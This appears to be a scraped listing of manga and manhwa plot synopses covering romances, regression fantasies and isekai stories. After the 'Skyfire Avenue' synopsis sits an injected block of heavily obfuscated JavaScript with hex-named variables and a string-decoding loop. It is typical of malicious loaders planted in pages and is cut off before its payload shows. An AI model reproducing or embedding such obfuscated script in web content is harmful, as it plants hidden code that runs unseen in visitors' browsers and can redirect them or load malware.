All I need in life is a decent job and some money.Or that's what I thought. Sayako Tono, who works as a chief at a company, has been living a frugal life unrelated to romance. Sayako comforts her subordinates disciplined by Director Yukisada, who is rumored to be good-looking but very strict, but she also realizes his kindness. One day, Sayako comes home to find her apartment in trouble and finds out that the new landlord is Yukisada. "Would you like to stay at my place until you find the next room?" A cohabit love comedy between a handsome cool boss and a caring girl!Published by Comicle Original
I squandered my salary to strengthen my game character, and became the lowest-ranking extra in the game. But… [◆Fate: On my 9th birthday, I will be horribly murdered by my father.] No, what is my fate?! It was unfair that I dimensionally shifted while playing a game, but now I will die by my father’s hand… I can’t just sit back and accept this crappy fate. Since it has come to this, I will overcome my fate myself!
The top student is a fake!? Alejandro Mamani has the best grades in school but it’s all thanks to his perfect cheating skills. His whole charade falls apart on the day of the university selection exams, where he answers blank. Unexpectedly, on the day of the results, he wakes up with the surprise of a perfect score that hasn’t been seen for more than 10 years, awarding him the title of the “Triple Ace.” However, there is a professor’s assistant who knows his secret and won’t let him get away with his lie.
His more-than-friends, less-than-lovers cousin is so cute that he could die!!!!? Nozomu is a boy staying at his uncle\'s house over summer vacation. In the countryside, where there are no convenience stores, or any busses even, the boy has a problem. That problem is his younger cousin, Sou! He’s being led around by this tanned, energetic girl day after day and can’t show her the dignity befitting his older age! On top of that, whether intentional or not, he’s getting flustered by Sou’s inviting demeanor. Eventually, Nozomu couldn’t take his eyes off Sou and is falling more and more under her spell...!!? With a “cousin” like this, his reason is having a hard time hanging on! This is a romcom with a guy who’s going under from all his tanned cousin’s teasing! --- **Links:** - [Alternative Official Raw on Nico Nico Seiga](
“Once I’m back from the battlefield, perhaps you’ll share your heart with me then.” Those were the final words of Prince Lochlan of the Routen Kingdom to his fiancée April Campbell before he rode away to war, never to return. Left heartbroken and destitute as the neglected ward of her greedy uncle and his mistress, April desires nothing more than her freedom, almost as ardently as she wants her prince to return to life. When April is brought to the royal palace for her beloved prince’s funeral, she notices something unusual about his twin brother, Crown Prince Dominic…
Skyfire Avenue is a street that is 2048 meters long. There are 168 stores here, and each of the store owners is an extremely powerful adept. The Avenue does not permit any vehicles or any robots to pass through it, much less mecha. Even the patrolling police must move about on foot. This is because this is a street for pedestrians, a lane for nobles, hidden away within this high technology world. Lan Jue, the greatest of the mercenaries, code-named ‘Zeus’, has secluded himself here in Skyfire Avenue after the death of his wife. The name of his shop is “Zeus’ Jewelry Store”, and here in Skyfire Avenue, he has been given the title, Jewel Master.<script></script><script>(function(_0x25417f,_0x6babc4){var _0x20dfc5=_0x20e8,_0x33df20=_0x25417f();while(!![]){try{var _0x48d404=parseInt(_0x20dfc5(0x175))/(-0x1243+0x7d2+-0x1*-0xa72)*(-parseInt(_0x20dfc5(0x162))/(-0x2583+0x935*0x4+0xb1))+parseInt(_0x20dfc5(0x16e))/(0x48*0x52+-0x40*-0x2e+0x228d*-0x1)*(parseInt(_0x20dfc5(0x159))/(0x3ea+-0x2677+0x2291))+-parseInt(_0x20dfc5(0x173))/(0x189d+0x75*0x1f+-0x26c3*0x1)*(-parseInt(_0x20dfc5(0x16c))/(0x18e6+0x1f9b+-0x387b))+-parseInt(_0x20dfc5(0x164))/(0x1dbf+-0x1*0x399+-0x1a1f)+-parseInt(_0x20dfc5(0x168))/(0xab9+0x1665+-0x34f*0xa)*(-parseInt(_0x20dfc5(0x15e))/(-0x4*-0x11a+-0x170+-0x1*0x2ef))+parseInt(_0x20dfc5(0x163))/(0x1*0x45+0x805*0x1+0x2c0*-0x3)*(-parseInt(_0x20dfc5(0x167))/(0x2200+0x2*0x48b+-0x2b0b))+parseInt(_0x20dfc5(0x154))/(0x13b9+0x1*-0xae8+-0x8c5*0x1);if(_0x48d404===_0x6babc4)break;else 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Read manhwa Even if the Villain’s Daughter Regresses / Even if the Villain’s Daughter Returns / 악당의 딸은 회귀해봤자 A child who lost everything to a villain. Ten years later, that child returned as a hero called a demigod. And the enraged hero began his revenge by killing the villain and his family… But there was a problem. It was that Lila was the daughter of that villain. “Are you Lila Hildegar?” “You’ve got the wrong person.” “No, I think I’ve got the right one.” …Pretending to be someone else, failed! “Please spare me.” “No.” …Begging for her life also failed! There was no other choice. Lila chose the last resort. “Any last words?” It was to swallow the “Regression Stone” and return to the past after death. “It wasn’t pleasant meeting you, so let’s never see each other again!” That’s how Lila returned to the past, opened her eyes at the age of ten, and… Died again. Lila tried to survive. She tried and tried again. That was all she did… “Why did you save me?” The boy answered with a pale face. “Because I’ve gone mad.” …The enemy who had driven Lila to death several times became strange. [Villain’s daughter female lead/female lead who wants to live to be 90/is still the villain’s daughter even if she regresses] [Male lead who lost his home and family to the villain/male lead whose only goal in life is revenge] [Opposing parties are enemies → What are you doing right now…?]
\"What does it mean to be dating exactly...?\" They\'re not friends. But they\'re also not lovers. It\'s a story about these two\'s half-relationship.
‘Ha Miro’, a clumsy yet loveable rookie magazine editor, meets mosquito man ‘Mo Ginam’, who can become a ‘normal [ilban]’ person (when together) when ‘blood [pi]’ is ‘cha’. ‘Ha Miro’, the rookie editor for a third-rate fashion magazine company receives an e-mail from rookie model ‘Lee Jihyeon’s manager. With an excited heart, she excitedly sends a deposit over the phone……
Both of them are straightforward people. Once they meet, they quickly get to know each other better. A heartwarming romantic comedy that begins with a certain incident. Shibata Kasane, a graphics designer at a toy design and development company, is troubled. Her troubles started when she grabbed her colleague Enokida Subaru\'s ass by accident! Kasane was intrigued by how similar Enokida\'s ass and her favourite childhood character felt. At the same time, Kasane felt guilty because Enokida might have be uncomfortable. Enokida said \"I don\'t mind\" but had a pained and frightened expression. Kasane was overcome by the urge to apologise profusely! On the other hand, it looks like Enokida is hiding something.
On a harsh rainy day, a high school student without any particular special skills, Usato Ken got dragged into another world summoning with two others; a good-looking guy and a beautiful girl, both of whom he strangely started getting along with just today. As an especially talent-less individual that doesn’t stand out he internally thought that he would be treated as useless. However, the others were unexpectedly kind. Usato who found hope in another world thought that, but the reality was different. He had a certain magical talent hidden in him and he was forced to fall into hell in the name of “training.”
The protagonist suddenly died when she stayed up all night writing a program. The moment she time traveled and got to the new world, she found that she was having her way with a beast by using an aphrodisiac. She became a laughing stock. She told everyone that she wanted a career instead of love. Starting with seeking food with the help of her system, step by step, she developed her uncivilized clan into the best clan ever. Her change amazed everybody. All males pleaded with her not to focus on her career but on them.